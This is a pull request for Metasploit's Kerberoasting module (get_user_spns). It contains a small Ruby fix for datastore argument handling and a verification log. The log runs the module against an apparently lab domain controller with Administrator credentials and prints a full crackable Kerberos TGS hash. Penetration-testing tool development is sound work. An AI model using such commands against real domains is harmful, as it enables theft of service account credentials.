### PR TITLE
Update impacket get user spns

### DIFF
--- a/lib/msf/core/module/external.rb
+++ b/lib/msf/core/module/external.rb
@@ -5,6 +5,11 @@ module Msf::Module::External
 
   def execute_module(path, method: :run, args: datastore, fail_on_exit: true)
     mod = Msf::Modules::External.new(path, framework: framework)
+    if args.is_a?(Msf::DataStore) || args.is_a?(Msf::DataStoreWithFallbacks)
+      datastore_to_h = args.to_h
+      datastore_to_h['rhost'] = args['RHOSTS'] if args['RHOSTS'] && datastore_to_h['rhost'].to_s.empty?
+      args = datastore_to_h
+    end
     success = mod.exec(method: method, args: args) do |m|
       begin
         case m.method


### PR DESCRIPTION
Updates the embedded impacket get_user_spn script; In the future we should rewrite this to use the latest Ruby primitives

## Verification

Run the module against a domain controller that has SPNs associated with user accounts

```
msf6 auxiliary(gather/get_user_spns) > run rhost=192.168.123.13 domain=adf3.local user=Administrator PASS=p4$$w0rd

[*] Running for 192.168.123.13...
[+] ServicePrincipalName           Name        MemberOf  PasswordLastSet             LastLogon  Delegation 
[+] -----------------------------  ----------  --------  --------------------------  ---------  ----------
[+] fake_msql/dc3.adf3.local:1433  fake_mysql            2022-02-10 10:57:13.356981  <never>               
[+] fake_msql/dc3.adf3.local       fake_mysql            2022-02-10 10:57:13.356981  <never>               
[+] $krb5tgs$23$*fake_mysql$ADF3.LOCAL$adf3.local/fake_mysql*$9bbd2b176d06cacc73c86dbcc0655ecf$65acb0189af9e09d613acfb6405b11b2b8aaa466b9baf0c838fc8dabaa77d51f0aa32e22fcb926bd59959f721039504a083e931782b8ef394208d5e7273683ec5e4369567c94913089c268203669f007459665bda317a32482bcc107662c1c9b4c436fb430936c19091b94b95a1f7b91edfe95daab9a1c0f960fac1b1aad9939e9c104950b1e90c38e4ebbad085848c8dff1b5b3e1d2f098eafd0ce442a5aece78af4dd6089b5f73922ff10a157a6a8acc595920b5dd45dfa1564b62cbb55687cc7f5e1a0714a15a048031ccbe5e0c57e62c083a54fcf22b0e0e1d58b56f9140924bce1b8ebf9253bae9a7cdfe4fe8793c19a8f05b1b0ae8c85a15f17927d5ad946b44481331caa0e46d6ba4bc88b7a343d5bbb651e19f59834b36b53e916a99da7699a5ac9900ff294adb7c7e386e712e387727074cf15ba1385865934fae6dfe4057c5292ad1076cf21810053b951c0cce38fa81b1a9f61b83dd8b7f2294994788dd8ee73f564191b77abecd031208cce7f3eca363be63e2a221f022b33ad399bfdcae46636db2d13e9269a3ba834c1ef7b1bb71bb0fa7b64d054c3e4c292720923c4484205689068714e2b43026e3b127fb3980ed0993dbae01fe3ef1870ae16d2a0837444452e036993c967641d79079cea7fea542133f985993354d988c85f8a13fb3b2257f0f2dcac039aa39368c25c29f30113591174f2dd39d1b7dbb902f2fa6e688839b214bb1e80b19676148c1152d40f509e004ca7280ddf21a5075f1237c68fe200e8063b3f645ed4b4cdeae968654c2de55ce33c726541ea3036dc719f5e208f27fbdb3dab6a2172b8b68f34ca5d123eb61dd834e8bf36b18dcb92567c8fc1960a3912a89cdbfddc232c94cdc9485196749e2f9cafac8d194e7a1243658c88c13cfd3b315bc10c053a752815001de1f4358614a4eba61a8f372be106bc566888830329eeb9d63afb35c99bbdae5ac13633637abdc5634c7067f334c68c31ae61214eba75fde2ec12fdc14d511e95df34c0222caeed68e5c65a86fb02ce8a4ed74e9f99c29114a910fe2a3f83cff46105374660acc69de0d68acab8cc08ce4d8370c7f508d2a8fb7f3942d82c16d6e4b8df704650719c2fde26c76a41db55f9f81cfdfff1090623378aceb399a12f973c09ccdb32788efc969185b0adfc34a0b5b917dd99528f5a61dd0236757ca09135a4d6658f6996a94b5be1958dead15701a7d808f9c2248854ba0dcf2b0d1be5e052f846a78cb531b949ada0ac15f59c723d30d47064c227c7a5e0252f4670c2adeba97dc61e08e77a04af3a6835af4c11c343d3ca09f968633f3a6439677cc328a0873606d953d4aea4e73e28d7368698b9202f3d337c159851ecec02007b5d396445612e6884cf5c0ffe8b67f13e4a9eea262965e967b6b619d32e21ed52be16aa0

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```